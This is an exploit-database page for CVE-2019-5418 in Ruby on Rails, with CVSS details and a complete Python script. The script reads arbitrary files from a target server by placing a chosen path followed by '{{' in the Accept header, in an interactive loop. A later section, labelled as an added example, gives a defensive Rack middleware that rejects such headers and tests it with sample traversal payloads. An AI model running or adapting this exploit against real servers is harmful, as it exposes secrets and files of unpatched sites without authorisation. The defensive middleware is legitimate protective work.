Rails 5.2.1 Arbitrary File Content Disclosure

2019.03.22
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

'''
Exploit Title: File Content Disclosure on Rails
Date: CVE disclosed 3/16 today's date is 3/20
Exploit Author: NotoriousRebel
Vendor Homepage: https://rubyonrails.org/
Software Link: https://github.com/rails/rails
Version: Versions Affected: all
Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
CVE: 2019-5418
'''

import sys

try:
    import requests
except ImportError:
    print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
    sys.exit(1)


def banner():
    banner = """
    ----------------------------------------------
    Arbitrary Traversal exploit for Ruby on Rails
    CVE-2019-5418
    ----------------------------------------------
    """
    print(banner)


def check_args():
    if len(sys.argv) != 2:
        print("Invalid number of arguments entered!")
        how_to_use = "python3 Bandit.py url"
        print('Use as:', how_to_use)
        sys.exit(1)


def check_url(url):
    # Compare the HTTP status code, not the Response object itself
    status_code = requests.get(url).status_code
    if status_code != 200:
        print("Url is invalid or can not be reached!")
        sys.exit(1)


def read_file(url, file):
    # The file path is sent in the Accept header, followed by '{{'
    headers = {'Accept': file + '{{'}
    req = requests.get(url, headers=headers)
    return req


def main():
    banner()
    check_args()
    url = sys.argv[1]
    while True:
        # Python 2 fallback: input() fails on a bare path there, so use raw_input()
        try:
            file = input("Enter file to read (enter quit to exit): ")
        except Exception:
            file = raw_input("Enter file to read (enter quit to exit): ")
        try:
            if file.lower() == 'quit':
                break
        except Exception:
            if file == 'quit':
                break
        response = read_file(url, file)
        print(response.text)


if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')
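
A defensive counterpart to the script above, as an added example that is not part of the original advisory or of Rails: a Rack middleware that answers 400 to any request whose Accept header is not a list of media ranges, which is the field the script fills with a file path followed by '{{'. The class name, the character allowlist and the length limit are assumptions; upgrading to one of the fixed versions listed above remains the actual fix.

```ruby
# Added example, not from the advisory or from Rails: a Rack middleware that
# only lets well-formed Accept headers through. Names and limits are assumptions.
# In a Rails app it could be registered with:
#   config.middleware.insert_before 0, StrictAcceptHeader
class StrictAcceptHeader
  MAX_LENGTH = 1024 # assumed upper bound for a legitimate Accept header

  # Conservative allowlist for a type or subtype: "*" or a restricted name.
  NAME  = /(?:\*|[A-Za-z0-9][A-Za-z0-9.+_-]*)/
  # Optional parameters such as ";q=0.9" or ";charset=utf-8".
  PARAM = /\s*;\s*[A-Za-z0-9_-]+=(?:[A-Za-z0-9.+_-]+|"[^"\\,]*")/
  MEDIA_RANGE = /\A#{NAME}\/#{NAME}(?:#{PARAM})*\z/

  def initialize(app)
    @app = app
  end

  # True when the header is absent or every comma-separated element is a
  # media range. Anything else (paths, "{{", empty elements) fails closed.
  def self.valid?(header)
    return true if header.nil? || header.strip.empty?
    return false if header.bytesize > MAX_LENGTH

    header.split(',', -1).all? { |range| MEDIA_RANGE.match?(range.strip) }
  end

  def call(env)
    return @app.call(env) if self.class.valid?(env['HTTP_ACCEPT'])

    [400, { 'content-type' => 'text/plain' }, ["malformed Accept header\n"]]
  end
end

# Constructed demo: a stand-in downstream app and three sample requests.
DEMO_APP = StrictAcceptHeader.new(->(_env) { [200, {}, ['ok']] })

def demo_status(accept)
  DEMO_APP.call('HTTP_ACCEPT' => accept).first
end

if $PROGRAM_NAME == __FILE__
  ['text/html,application/xml;q=0.9,*/*;q=0.8',   # browser-style header
   '/constructed/path/secret.txt{{',              # shape sent by the script
   '../../constructed/file{{'].each do |accept|
    puts format('%-45s -> %d', accept, demo_status(accept))
  end
end
```

The check is a stopgap in front of an unpatched application and also makes rejected requests easy to count in logs, since every one of them ends in a 400 from this middleware.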



Copyright 2024, cxsecurity.com

 
